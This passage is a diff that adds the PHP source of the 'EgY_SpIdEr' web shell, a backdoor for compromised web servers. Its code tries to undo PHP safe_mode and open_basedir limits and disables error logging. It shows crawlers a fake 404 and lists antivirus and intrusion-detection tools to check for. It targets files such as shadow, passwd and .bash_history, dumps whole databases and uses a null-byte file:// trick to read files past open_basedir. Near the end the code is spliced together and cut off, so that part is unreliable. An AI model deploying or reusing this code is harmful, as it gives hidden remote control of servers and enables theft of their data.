+ setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
+ }
+ }
+ else $err = 'Login Faild !';
+}
+// Remember-me cookie exists
+elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
+ if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
+ $_SESSION['txtauthin'] = true;
+ }
+ else $err = 'Login Faild !';
+}
+if (!$_SESSION['txtauthin']) {
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+?>
+<html dir=rtl>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title><?=$tacfg['title']?></title>
+
+<STYLE>
+
+BODY
+ {
+ SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+tr {
+BORDER-RIGHT: #dadada ;
+BORDER-TOP: #dadada ;
+BORDER-LEFT: #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT: #dadada ;
+BORDER-TOP: #dadada ;
+BORDER-LEFT: #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #dadada;
+}
+.table1 {
+BORDER: 1;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+.td1 {
+BORDER: 1;
+font: 7pt tahoma;
+color:
#ffffff;
+}
+.tr1 {
+BORDER: 1;
+color: #dadada;
+}
+table {
+BORDER: #eeeeee outset;
+BACKGROUND-COLOR: #000000;
+color: #dadada;
+}
+input {
+BORDER-RIGHT: #00FF00 1 solid;
+BORDER-TOP: #00FF00 1 solid;
+BORDER-LEFT: #00FF00 1 solid;
+BORDER-BOTTOM: #00FF00 1 solid;
+BACKGROUND-COLOR: #333333;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT: #ffffff 1 solid;
+BORDER-TOP: #999999 1 solid;
+BORDER-LEFT: #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #dadada;;
+}
+submit {
+BORDER: buttonhighlight 1 outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #dadada;
+}
+textarea {
+BORDER-RIGHT: #ffffff 1 solid;
+BORDER-TOP: #999999 1 solid;
+BORDER-LEFT: #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #333333;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 1;
+color: #dadada;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+ document.getElementById(id).style.display = \'none\';
+ document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+ document.getElementById(id).style.display = \'block\';
+ document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+ if (document.getElementById(id).style.display == \'none\')
+ show_div(id);
+ else
+ hide_div(id);
+}
+</script>';
+
+<body>
+<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
+<hr width="300" size="1" noshade color="#cdcdcd">
+<p>
+<div align="center" class="grey">
+<?=$tacfg['helptext']?>
+</div>
+<p>
+<?
+if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI']; +else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING']; +if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action); +?> +<form name="txtauth" action="<?=$action?>" method="post"> +<div align="center"> +<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr"> +<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?> +<?if (isset($tacfg['uname'])) {?> +<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr> +<?}?> +<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr> +<?if ($tacfg['allowrm']) {?> +<tr><td align="left"><input type="submit" name="login" value="Login"> +</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> + Remmeber Me?</label></td></tr> +<?} else {?> +<tr><td colspan="2" align="center"> + <input type="submit" name="login" value="Login"></td></tr> +<?}?> +</table> +</div> +</form> + +<br><br> +<hr width="300" size="1" noshade color="#cdcdcd"> +<div class="smalltxt" align="center">Developed by + <a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>?copyright ? + & EgY SpIdEr</div> + +</body> +</html> +<? + // Don't delete this! + exit(); +} +?> +Login As (<font color="#FF0000"><? 
echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p>
+<div align="right">
+<?php
+
+if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
+
+$language='eng';
+
+$auth = 0;
+
+$name='7d1f6442a9ed59e62f93dcbc2695baa6';
+$pass='7d1f6442a9ed59e62f93dcbc2695baa6';
+
+//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
+@setlocale(LC_ALL,'ru_RU.cp1251');
+
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+if(@function_exists('ini_set'))
+ {
+ @ini_set('error_log',NULL);
+ @ini_set('log_errors',0);
+ @ini_set('file_uploads',1);
+ @ini_set('allow_url_fopen',1);
+ }
+else
+ {
+ @ini_alter('error_log',NULL);
+ @ini_alter('log_errors',0);
+ @ini_alter('file_uploads',1);
+ @ini_alter('allow_url_fopen',1);
+ }
+
+error_reporting(E_ALL);
+
+/* ??? ????? */
+$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
+$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
+$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
+$downloaders = array('wget','fetch','lynx','links','curl','get');
+
+/* ??? ?????? ???????? ???? ?????
realpath() */
+//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
+//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
+//$chars_rlph = "_-.01234567890";
+$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
+
+$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
+'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
+'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
+'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
+
+/******************************************************************************************************/
+
+define("starttime",@getmicrotime());
+
+if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
+
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@function_exists('ini_set'))
+ {
+ @ini_set('max_execution_time',0);
+ @ini_set('output_buffering',0);
+ }
+else
+ {
+ @ini_alter('max_execution_time',0);
+ @ini_alter('output_buffering',0);
+ }
+$safe_mode = @ini_get('safe_mode');
+#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
+$version = '1.42';
+if(@version_compare(@phpversion(), '4.1.0') == -1)
+ {
+ $_POST = &$HTTP_POST_VARS;
+ $_GET = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+ {
+ $_POST[$k] = stripslashes($v);
+ }
+ foreach
($_COOKIE as $k=>$v)
+ {
+ $_COOKIE[$k] = stripslashes($v);
+ }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+ {
+ header('WWW-Authenticate: Basic realm="HELLO!"');
+ header('HTTP/1.0 401 Unauthorized');
+ exit("<h1>Access Denied</h1>");
+ }
+}
+
+if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
+ $tempdir='./';
+ $select_tempdir = '<select name=tempdir><option value="./">./</option>';
+ foreach( $tempdirs as $item) {
+ if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
+ }
+ $select_tempdir .= '</select>';
+}else{
+ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
+ $select_tempdir = $_COOKIE['select_tempdir'];
+}
+
+$head = '<!-- EgY_SpIdEr -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>EgY_SpIdEr ShElL</title>
+
+
+
+<STYLE>
+
+BODY
+ {
+ SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+tr {
+BORDER-RIGHT: #333333 ;
+BORDER-TOP: #333333 ;
+BORDER-LEFT: #333333 ;
+BORDER-BOTTOM: #333333 ;
+color: #FFFFFF;
+}
+td {
+BORDER-RIGHT: #333333 ;
+BORDER-TOP: #333333 ;
+BORDER-LEFT: #333333 ;
+BORDER-BOTTOM: #333333 ;
+color: #FFFFFF;
+}
+.table1 {
+BORDER: 1;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+.td1 {
+BORDER: 1;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1;
+color: #333333;
+}
+table {
+BORDER: #eeeeee outset;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+input {
+BORDER-RIGHT:
#00FF00 1 solid; +BORDER-TOP: #00FF00 1 solid; +BORDER-LEFT: #00FF00 1 solid; +BORDER-BOTTOM: #00FF00 1 solid; +BACKGROUND-COLOR: #333333; +font: 9pt tahoma; +color: #ffffff; +} +select { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #000000; +font: 9pt tahoma; +color: #333333;; +} +submit { +BORDER: buttonhighlight 1 outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #333333; +} +textarea { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #333333; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 1; +color: #333333; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} + +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? 
getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . 
+ pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} + +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } + +function moreread($temp){ +global $lang,$language; +$str=''; + if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ + if($ffile){ + while(!@feof($ffile)){$str .= @fgets($ffile);}; + fclose($ffile); + } + }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ + if($ffile){ + $str = @fread($ffile, @filesize($temp)); + @fclose($ffile); + } + }elseif(@function_exists('file')&&($ffiles = @file($temp))){ + foreach ($ffiles as $ffile) { $str .= $ffile; } + }elseif(@function_exists('file_get_contents')){ + $str = @file_get_contents($temp); + }elseif(@function_exists('readfile')){ + $str = @readfile($temp); + }elseif(@function_exists('highlight_file')){ + $str = @highlight_file($temp); + }elseif(@function_exists('show_source')){ + $str = @show_source($temp); + }else{echo $lang[$language.'_text56'];} +return $str; +} + +function 
readzlib($filename,$temp=''){ +global $lang,$language; +$str=''; + if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; + if(@copy("compress.zlib://".$filename, $temp)) { + $str = moreread($temp); + } else echo $lang[$language.'_text119']; + @unlink($temp); +return $str; +} + +function morewrite($temp,$str='') +{ +global $lang,$language; + if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fwrite($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fputs($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('file_put_contents')){ + @file_put_contents($temp,$str); + }else return 0; +return 1; +} + +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!@function_exists('mssql_connect')) return 0; + $this->connection = 
@mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!@function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!@function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + case 'MySQLi': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysqli_connect')) return 0; + $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); + if(is_resource($this->connection)) return 1; + break; + case 'mSQL': + if(!@function_exists('msql_connect')) return 0; + $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'SQLite': + if(!@function_exists('sqlite_open')) return 0; + $this->connection = @sqlite_open($this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + case 'MySQLi': + return 1; + break; + case 'mSQL': + if(@msql_select_db($this->base,$this->connection)) return 1; + break; + case 'SQLite': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + 
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + case 'MySQLi': + if(false===($this->res=@mysqli_query($this->connection,$query))) + { + $this->error = @mysqli_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'mSQL': + if(false===($this->res=@msql_query($query,$this->connection))) + { + $this->error = @msql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'SQLite': + if(false===($this->res=@sqlite_query($this->connection,$query))) + { + $this->error = @sqlite_error_string($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + 
@mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MySQLi': + $this->num_rows=@mysqli_num_rows($this->res); + $this->num_fields=@mysqli_num_fields($this->res); + while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); + @mysqli_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'mSQL': + $this->num_rows=@msql_num_rows($this->res); + $this->num_fields=@msql_num_fields($this->res); + while(false !== ($this->rows[] = @msql_fetch_array($this->res))); + @msql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'SQLite': + $this->num_rows=@sqlite_num_rows($this->res); + $this->num_fields=@sqlite_num_fields($this->res); + while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = 
'##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MySQLi': + $this->dump[0] = '## MySQLi dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'mSQL': + $this->dump[0] = '## mSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'SQLite': + $this->dump[0] = '## SQLite dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + case 'MySQLi': + @mysqli_close($this->connection); + break; + case 'mSQL': + @msql_close($this->connection); + break; + case 'SQLite': + @sqlite_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + case 'MySQLi': + return @mysqli_affected_rows($this->res); + break; + case 'mSQL': + return @msql_affected_rows($this->res); + break; + case 'SQLite': + return @sqlite_changes($this->res); + break; + default: + return 0; + break; + break; +case 'cURL': + if(empty($_POST['egy_spider'])){ + + +} else { +$curl=$_POST['egy_spider']; +$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +echo "</textarea></CENTER>"; + +} +break; +case 'copy': + +if(empty($snn)){ +if(empty($_GET['snn'])){ +if(empty($_POST['snn'])){ + +} else { +$u1p=$_POST['snn']; +} +} else { +$u1p=$_GET['snn']; +} +} + $u1p=""; // File to Include... 
